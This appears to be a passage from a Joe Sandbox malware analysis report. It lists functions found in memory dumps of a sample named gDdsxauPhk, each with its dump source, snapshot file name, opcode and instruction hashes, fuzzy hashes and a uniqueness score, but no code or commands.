                                                        • Instruction ID: 03d38b8f53fa5de14c13ab8d74c9a6ed290f787b294e9496c03d6da8a245310a
                                                        • Opcode Fuzzy Hash: 341508a56ce15a01c7f2777902ff4dec843570abac1607631c4e6403b4de3e08
                                                        • Instruction Fuzzy Hash: EE01DFB1B001201BDB65EA2ED8A4B7F77DBDBC9610F108829E50FC7340DA25DC034391
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43024 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c4163e061d65078af849bafb78bbb778cf54e0e321460366be97d8fd82c267b0
                                                        • Instruction ID: d859dbf12a0cacf20bd944717f2dd091a8bb7a2798a115569bc04ffbc18774dd
                                                        • Opcode Fuzzy Hash: c4163e061d65078af849bafb78bbb778cf54e0e321460366be97d8fd82c267b0
                                                        • Instruction Fuzzy Hash: EF21E5B1D00219AFCB00DF9AD884ADEFBF4FB48310F10816AE918A7201C3746954CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D207 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                        • Instruction ID: 85d04c1d4745cfbe6c180e1801d4e2886e2fb3644a5e35df5bbeda7444b2cf7d
                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                        • Instruction Fuzzy Hash: 7511D075504288CFDB12CF54D5C4B16BF61FB84224F24C6AAD9490B687C33AD44ACB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D3B7 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 1d114044a15ad21e7240ba4cb3a698888d6540e8a50dc247236e8643666ec816
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 4711D075604288CFDB02CF54D5C4B55BF71FB84314F24C6AAD9494B296C33AE84ACB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D03F Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 7a68ecb687e18753e8234ac738e473b6bea66afbd0eba7d58ddd114843c95459
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: AE11D075604248CFDB12CF54C9C4B15BF61FB84314F24C6A9DD894B292C33AD44ACF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43F87 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82d8f6cc689493803bc24f6cd31186069df758946163741685a66678488a8df0
                                                        • Instruction ID: 542a0495ac42d82b8044c79e38a1cdf97928ff8f4d87acab6873b1e5ac4c1d49
                                                        • Opcode Fuzzy Hash: 82d8f6cc689493803bc24f6cd31186069df758946163741685a66678488a8df0
                                                        • Instruction Fuzzy Hash: 0901D831B201255BEB549A689C10BEB73FBDBC4204F04013AE40AD7344DE688C1247D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B441E0 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b34b4162275699994784e4399656da6a0e45c08c54fb2fc82c47681dd954efc
                                                        • Instruction ID: 8c4d1821190878521fcd23675834b13f51db2cf21c4110e8e9dac88c8c35c421
                                                        • Opcode Fuzzy Hash: 5b34b4162275699994784e4399656da6a0e45c08c54fb2fc82c47681dd954efc
                                                        • Instruction Fuzzy Hash: 2D01DC70B101211BDB64AABEA860B2BF2DADBC9710F20843AE50EC7380EE35DC024395
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4C78A Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae2206ddb044d7b7116a31dbbe413937dde663654c74c5b28dc516b3deacf247
                                                        • Instruction ID: 9197e3058af30047d55c68be402b36083146c924febd45bfc41ea500e8552263
                                                        • Opcode Fuzzy Hash: ae2206ddb044d7b7116a31dbbe413937dde663654c74c5b28dc516b3deacf247
                                                        • Instruction Fuzzy Hash: D2014C71A122256BCB259A3AEC40A9ABF79E785710F004179F405EB381DB369C0487D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4F170 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5e873b6849b77e860e229451da798610f1b07524bd61f8aa728c8fb854e0831
                                                        • Instruction ID: 4d372b00ca6e0149d6360b595aaa082ba73f401ab26d69e55760d201ae7413f2
                                                        • Opcode Fuzzy Hash: e5e873b6849b77e860e229451da798610f1b07524bd61f8aa728c8fb854e0831
                                                        • Instruction Fuzzy Hash: 8B018CB1B101211BDB64AA2ED894B3EB7DBEBC9610F14987AE60AC7340DA25DC024385
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4A2E0 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66a0ff5400141065ce7329a389dea63fc7451f6e97432352a12db4708e2507a1
                                                        • Instruction ID: ac61488e8af75d9c47ae602ea8d1d3c1d57eb9044f364b7fd630cbd0d32776ef
                                                        • Opcode Fuzzy Hash: 66a0ff5400141065ce7329a389dea63fc7451f6e97432352a12db4708e2507a1
                                                        • Instruction Fuzzy Hash: DA01A470B401141FDB74EA7DE554B2EB7EAE789710F109479E10ED7744EE25EC028785
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B46450 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ef338648a435af1cb9c769aca2dd8c075d999c770f993f7fdd6c8b6ed0a3059
                                                        • Instruction ID: 801eadf63e56ffacd72c71ad2023dbc0ed4bf1ac69f6060054d108f80f6c7b0b
                                                        • Opcode Fuzzy Hash: 5ef338648a435af1cb9c769aca2dd8c075d999c770f993f7fdd6c8b6ed0a3059
                                                        • Instruction Fuzzy Hash: 62E022B0A082486FCF60EEB48C5064B7FA9CB03258F1080E2D444CB243E536C9029BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%